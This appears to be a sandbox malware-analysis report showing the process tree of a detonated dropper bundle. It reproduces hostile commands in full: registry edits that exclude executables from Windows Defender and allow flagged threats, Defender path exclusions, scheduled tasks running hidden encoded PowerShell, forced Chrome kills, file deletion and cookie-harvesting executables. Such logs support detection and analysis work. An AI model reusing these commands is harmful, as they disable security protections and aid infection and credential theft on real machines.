        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        15⤵
        
        PID:18212
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        15⤵
        
        PID:18272
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "ggmEgTpmp" /SC once /ST 04:30:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        13⤵
        Creates scheduled task(s)
        
        PID:2804
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "ggmEgTpmp"
        13⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "ggmEgTpmp"
        13⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe\" nh /site_id 754 /S" /V1 /F
        13⤵
        Creates scheduled task(s)
        
        PID:6420
    - - C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\hjjgaa.exe" /Verysilent
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:10556
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        Executes dropped EXE
        
        PID:10696
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        Executes dropped EXE
        
        PID:15064

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:17764

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:17848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\is-DG475.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DG475.tmp\Setup3310.tmp" /SL5="$20358,138429,56832,C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:4780
- C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe" /Verysilent
  2⤵
  PID:6096
- - C:\Users\Admin\AppData\Local\Temp\is-ALJGT.tmp\Setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-ALJGT.tmp\Setup.tmp" /SL5="$9029A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe" /Verysilent
    3⤵
    PID:6176
  - - C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe
      "C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe" /Verysilent
      4⤵
      PID:5888
    - - C:\Users\Admin\AppData\Local\Temp\is-8BVRO.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8BVRO.tmp\Delta.tmp" /SL5="$20484,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe" /Verysilent
        5⤵
        
        PID:6424
      - C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe" /VERYSILENT
        6⤵
        
        PID:10320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:11420
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        8⤵
        Kills process with taskkill
        
        PID:11604
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:11672
  - - C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe
      "C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe" /Verysilent
      4⤵
      PID:10356
    - - C:\Users\Admin\AppData\Local\Temp\is-FUN0P.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FUN0P.tmp\PictureLAb.tmp" /SL5="$30484,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe" /Verysilent
        5⤵
        
        PID:10388
      - C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe" /VERYSILENT
        6⤵
        
        PID:8480
        
        C:\Users\Admin\AppData\Local\Temp\is-277LS.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-277LS.tmp\Setup.tmp" /SL5="$602B8,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe" /VERYSILENT
        7⤵
        
        PID:8652
        
        C:\Users\Admin\AppData\Local\Temp\is-C5R0G.tmp\HGT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C5R0G.tmp\HGT.exe" /S /UID=lab214
        8⤵
        
        PID:10596
        
        C:\Users\Admin\AppData\Local\Temp\b8-a8d5e-ec3-94eb3-bc538509b4545\Qaecybileco.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b8-a8d5e-ec3-94eb3-bc538509b4545\Qaecybileco.exe"
        9⤵
        
        PID:11336
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe & exit
        10⤵
        
        PID:10636
        
        C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe
        11⤵
        
        PID:12016
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:12184
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:15032
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe & exit
        10⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe
        11⤵
        
        PID:4476
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe & exit
        10⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe
        
        C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe
        11⤵
        
        PID:10152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        12⤵
        
        PID:10632
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        13⤵
        Kills process with taskkill
        
        PID:10848
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe & exit
        10⤵
        
        PID:12432
        
        C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe
        
        C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe
        11⤵
        
        PID:12672
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
        12⤵
        
        PID:13376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe & exit
        10⤵
        
        PID:12852
        
        C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe
        11⤵
        
        PID:13096
        
        C:\ProgramData\2407718.26
        
        "C:\ProgramData\2407718.26"
        12⤵
        
        PID:13948
        
        C:\ProgramData\1122819.12
        
        "C:\ProgramData\1122819.12"
        12⤵
        
        PID:14012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jbvqggae.bfu\GcleanerWW.exe /mixone & exit
        10⤵
        
        PID:12928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe & exit
        10⤵
        
        PID:13280
        
        C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
        11⤵
        
        PID:17884
        
        C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
        12⤵
        
        PID:13908
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe /8-2222 & exit
        10⤵
        
        PID:13728
        
        C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe /8-2222
        11⤵
        
        PID:11696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Violet"
        12⤵
        
        PID:14248
        
        C:\Program Files (x86)\Lingering-Violet\7za.exe
        
        "C:\Program Files (x86)\Lingering-Violet\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        12⤵
        
        PID:16128
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Violet\setup.exe" -map "C:\Program Files (x86)\Lingering-Violet\WinmonProcessMonitor.sys""
        12⤵
        
        PID:5856
        
        C:\Program Files (x86)\Lingering-Violet\setup.exe
        
        "C:\Program Files (x86)\Lingering-Violet\setup.exe" -map "C:\Program Files (x86)\Lingering-Violet\WinmonProcessMonitor.sys"
        13⤵
        
        PID:5832
        
        C:\Program Files (x86)\Lingering-Violet\7za.exe
        
        "C:\Program Files (x86)\Lingering-Violet\7za.exe" e -p154.61.71.51 winamp.7z
        12⤵
        
        PID:7648
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe & exit
        10⤵
        
        PID:11688
        
        C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe
        11⤵
        
        PID:14244
        
        C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        12⤵
        
        PID:14920
        
        C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 1 3.1616085601.605382614a8e4 104
        13⤵
        
        PID:8296
        
        C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 2 3.1616085601.605382614a8e4
        14⤵
        
        PID:17032
        
        C:\Users\Admin\AppData\Local\Temp\timn2vktyss\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\timn2vktyss\askinstall24.exe"
        15⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        16⤵
        
        PID:17904
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        17⤵
        Kills process with taskkill
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\is-G2B67.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G2B67.tmp\vict.tmp" /SL5="$603EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:18020
        
        C:\Users\Admin\AppData\Local\Temp\is-HD1G8.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HD1G8.tmp\wimapi.exe" 535
        17⤵
        
        PID:17996
        
        C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\is-CGU5H.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CGU5H.tmp\Setup3310.tmp" /SL5="$803C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\is-TEDIQ.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TEDIQ.tmp\Setup.tmp" /SL5="$3056C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe" /Verysilent
        18⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\eafxssbeay0\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eafxssbeay0\AwesomePoolU1.exe"
        15⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\f3bcgbntwu0\2jxl2u4oaxm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f3bcgbntwu0\2jxl2u4oaxm.exe" /ustwo INSTALL
        15⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe" ll
        12⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\is-0LI7B.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0LI7B.tmp\setups.tmp" /SL5="$704DE,549376,61440,C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe" ll
        13⤵
        
        PID:14636
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe /S /kr /site_id=754 & exit
        10⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe /S /kr /site_id=754
        11⤵
        
        PID:15132
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        12⤵
        
        PID:15588
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        13⤵
        
        PID:14972
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        14⤵
        
        PID:16044
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        14⤵
        
        PID:15816
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gGgvEfWam" /SC once /ST 03:08:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        12⤵
        Creates scheduled task(s)
        
        PID:17252
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gGgvEfWam"
        12⤵
        
        PID:17808
  - - C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\hjjgaa.exe" /Verysilent
      4⤵
      PID:11372
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:11612
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:10108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5324

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5848

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7576

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7636
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1a099d32-b6ae-7d47-be89-332701aff930}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:7684
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
  2⤵
  PID:7804

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe nh /site_id 754 /S
1⤵
PID:7764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8936
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9332
